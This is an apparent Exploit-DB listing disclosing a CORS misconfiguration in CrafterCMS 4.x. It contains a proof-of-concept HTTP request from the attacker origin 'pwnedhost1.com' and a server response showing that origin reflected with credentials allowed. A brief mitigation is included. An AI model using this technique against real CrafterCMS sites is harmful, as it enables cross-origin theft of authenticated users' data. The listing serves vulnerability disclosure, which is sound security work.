craftercms 4.x.x - CORS - exploit.company

vendor:

craftercms

by:

nu11secur1ty

7.5

CVSS

HIGH

Cross-Origin Resource Sharing (CORS)

352

CWE

Product Name: craftercms

Affected Version From: 4.x.x

Affected Version To: 4.x.x

Patch Exists: NO

Related CWE:

CPE: a:craftercms:craftercms:4.x.x

Metasploit:

Other Scripts:

Platforms Tested:

2023

craftercms 4.x.x – CORS

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain. The application allowed access from the requested origin pwnedhost1.com which domain is on the attacker. The application allows two-way interaction from the pwnedhost1.com origin. This effectively means that any domain can perform two-way interaction by causing the browser to submit the null origin, for example by issuing the request from a sandboxed iframe. The attacker can use some library of the victim and this can be very dangerous!

Mitigation:

Implement a strong CORS policy that only allows access from trusted domains.

Source

Exploit-DB raw data:

## Exploit Title: craftercms 4.x.x - CORS 
## Author: nu11secur1ty
## Date: 03.07.2023
## Vendor: https://docs.craftercms.org/en/4.0/index.html#
## Software: https://github.com/craftercms/craftercms/tags => 4.x.x
## Reference: https://portswigger.net/web-security/cors


## Description:
The application implements an HTML5 cross-origin resource sharing
(CORS) policy for this request that allows access from any domain.
The application allowed access from the requested origin
pwnedhost1.com which domain is on the attacker.
The application allows two-way interaction from the pwnedhost1.com
origin. This effectively means that any domain can perform two-way
interaction by causing the browser to submit the null origin, for
example by issuing the request from a sandboxed iframe. The attacker
can use some library of the
victim and this can be very dangerous!

STATUS: HIGH Vulnerability

[+]Exploit:

[-]REQUEST...

```GET
GET /studio/api/1/services/api/1/server/get-available-languages.json HTTP/1.1
Host: 192.168.100.87:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178
Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: XSRF-TOKEN=5ce93c90-2b85-4f9a-9646-2a1e655b1d3f;
JSESSIONID=4730F0ED2120D31A17574CE997325DA8
Referer: http://192.168.100.87:8080/studio/login
x-requested-with: XMLHttpRequest
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="110", "Chromium";v="110"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Origin: http://pwnedhost1.com/
```
[-]RESPONSE:

```
HTTP/1.1 200
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: http://pwnedhost1.com/
Access-Control-Allow-Credentials: true
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
Date: Tue, 07 Mar 2023 11:00:19 GMT
Connection: close
Content-Length: 124

[{"id":"en","label":"English"},{"id":"es","label":"Espa..ol"},{"id":"kr","label":"........."},{"id":"de","label":"Deutsch"}]
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/CrafterCMS/CrafterCMS-4.0.0)

## Proof and Exploit:
[href](https://streamable.com/jd1x8j)

## Time spend:
01:00:00



-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>